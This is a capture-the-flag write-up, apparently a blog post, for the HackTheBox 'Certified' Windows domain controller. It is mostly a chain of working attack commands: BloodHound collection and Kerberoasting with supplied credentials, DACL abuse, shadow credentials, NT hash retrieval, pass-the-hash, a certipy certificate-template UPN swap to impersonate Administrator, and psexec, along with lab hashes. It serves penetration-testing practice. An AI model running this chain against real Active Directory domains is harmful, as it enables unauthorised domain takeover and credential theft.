Post

HackTheBox Certified Writeup

Posted
By x3ric
4 min read

Explore the fundamentals of cybersecurity in the Certified Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

1

10.10.11.41 cerified.htb

Script to add hosts automatically

1
2
3

ip="10.10.11.41"
domain="cerified.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

1

nmap -sCV cerified.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

Nmap scan report for certified.htb (10.10.11.41)
Host is up (0.050s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-07 08:07:35Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-07T08:08:57+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-11-07T08:08:20
|_  start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

System Info:

  • User: judith.mader
  • Password: judith09

Run BloodHound Data Collection:

1

bloodhound-python -d certified.htb -c All -ns 10.10.11.41 --zip -u judith.mader -p judith09 --use-ldap

Resolving Clock Skew Issues

Synchronize System Time:

  • Check current time offset using NTP:
    1

    ntpdate -q 10.10.11.41

Adjust Time for Commands:

  • Define a function to adjust time for applications (requires libfaketime):
    1
2
3

    fakedate() {
 /usr/bin/faketime "$(date -d "$(date) $(echo "$(ntpdate -q 10.10.11.41)" | awk '/offset/ {print $10}' | sed 's/,$//') seconds" "+%Y-%m-%d %H:%M:%S")" "$@"
}

Execute Time-Sensitive Command:

  • Run the Kerberos-related command with correct timing:
    1

    fakedate GetUserSPNs.py certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41 -request

Note: No need to crack the password; this is just to verify that it works.

Privilege Escalation

Set Judith as Owner of Management Group:

1

bloodyad --host 10.10.11.41 -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader

Grant Judith Write Permissions for Management Members:

1

dacledit.py 'certified.htb/judith.mader:judith09' -action write -rights WriteMembers -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB'

Add Judith to the Management Group:

1

net rpc group addmem "Management" "judith.mader" -I 10.10.11.41 -U 'certified.htb\judith.mader%judith09'

PyWhisker AD Management Setup:

1
2
3
4
5

git clone https://github.com/0xPreDa/pywhisker
cd pywhisker
pipx ensurepath
pipx install .
pywhisker -d certified.htb --dc-ip 10.10.11.41 -u 'judith.mader' -p 'judith09' -t 'management_svc' --action add

Encountering ”[!] Unsupported hash type MD4” in PyWhisker? Enable legacy algorithms in OpenSSL to resolve this:

  1. Edit OpenSSL config:
    1

    sudo nano /etc/ssl/openssl.cnf
  2. Add the following to enable MD4:
    1
2
3
4
5
6
7
8
9

    [provider_sect]
default = default_sect
legacy = legacy_sect

[default_sect]
activate = 1

[legacy_sect]
activate = 1

For more info, see this GitHub issue.

Get TGT Using PKINIT :

1

fakedate gettgtpkinit -cert-pfx $(pwd)/<file>.pfx -pfx-pass '<psw>' -dc-ip 10.10.11.41 certified.htb/management_svc management_svc.ccache

Set ccache and Retrieve NT Hash:

1
2

export KRB5CCNAME=management_svc.ccache
fakedate getnthash certified.htb/management_svc -key <key>
  • Result: NT hash for management_svc is a091c1832bcdd4677c28b5a6a1295584.
1

evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584

Retrieve User Flag

1

type \users\management_svc\desktop\user.txt

Impersonate the ca_operator with the management_svc since DACL (Discretionary Access Control List) grants all permissions.

1

fakedate certipy shadow auto -username "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -account ca_operator
  • Result: NT hash for ca_operator is b4b86f45c6018f1b664f70805f45d8f2.

Update UPN for ca_operator:

1

certipy account update -username "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator

Request Certificate for Administrator Privileges:

1

certipy req -username 'ca_operator@certified.htb' -hashes 'b4b86f45c6018f1b664f70805f45d8f2' -target 'DC01.certified.htb' -ca 'certified-DC01-CA' -dc-ip 10.10.11.41 -template CertifiedAuthentication -debug

Restore UPN for ca_operator:

1

certipy account update -username "management_svc@certified.htb" -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn "ca_operator@certified.htb"

Authenticate as Administrator:

1

fakedate certipy auth -pfx administrator.pfx -domain "certified.htb"

Execute Remote Command as Administrator:

1

psexec.py administrator@certified.htb -hashes :0d5b49608bbce1751f708748f67e2d34

Retrieve User Flag

1

type \users\administrator\desktop\root.txt
machine
htb cft writeup windows
This post is licensed under CC BY 4.0 by the author.